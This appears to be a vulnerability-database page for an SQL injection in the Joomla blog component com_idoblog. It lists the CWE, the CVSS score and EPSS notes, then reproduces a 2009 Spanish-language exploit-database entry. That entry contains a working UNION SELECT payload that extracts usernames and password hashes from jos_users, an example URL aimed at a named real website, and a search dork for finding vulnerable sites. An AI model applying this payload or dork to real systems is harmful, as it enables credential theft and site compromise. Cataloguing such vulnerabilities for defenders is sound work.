Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-89 |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
7.5 |
|
AV:N/AC:L/Au:N/C:P/I:P/A:P |
nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 9413
Publication date : 2009-08-10 22h00 +00:00
Author : kkr
EDB Verified : Yes
#####################################################################################
#### com_idoblog SQL Injection ALL VERSIONS ####
#####################################################################################
# #
# Descubierto por : KKR #
# Somos: knet, kiko, ricota, servl #
# Contacto: elricota[*A*T*]gmail[*D*O*T]com #
#####################################################################################
[+] Ediciones anteriores tenian las mismas fallas pero no fixearon todo...
[+] Esta sql injection afecta todas las versiones.
[-]
[+] exploit:
[-] /index.php?option=com_idoblog&task=profile&Itemid=1337&userid=<usuario existente>+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
[+]
[-] Ejemplo:
[+] http://www.rayservpc.co.uk/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
[-]
[+] d0rk: inurl:"com_idoblog"
[-] http://www.diosdelared.com // http://www.remoteexecution.net/foro/
[-----------------------------------------------------------------------------------]
note:
<name>idoblog</name>
<creationDate>17 07 2008</creationDate>
<author>Sunshine studio</author>
<authorEmail>kotofeus@mail.ru</authorEmail>
<authorUrl>http://sunshinestudio.ru</authorUrl>
<copyright>Sunshine studio</copyright>
<license>Creative Commons v3.0</license>
<version>v 1.1 (build 30)</version>
<description>Blogs-system for Joomla 1.5</description>
# milw0rm.com [2009-08-11]
Products Mentioned
Configuraton 0
Idojoomla>>Com_idoblog >> Version 1.1
Joomla>>Joomla\! >> Version *
References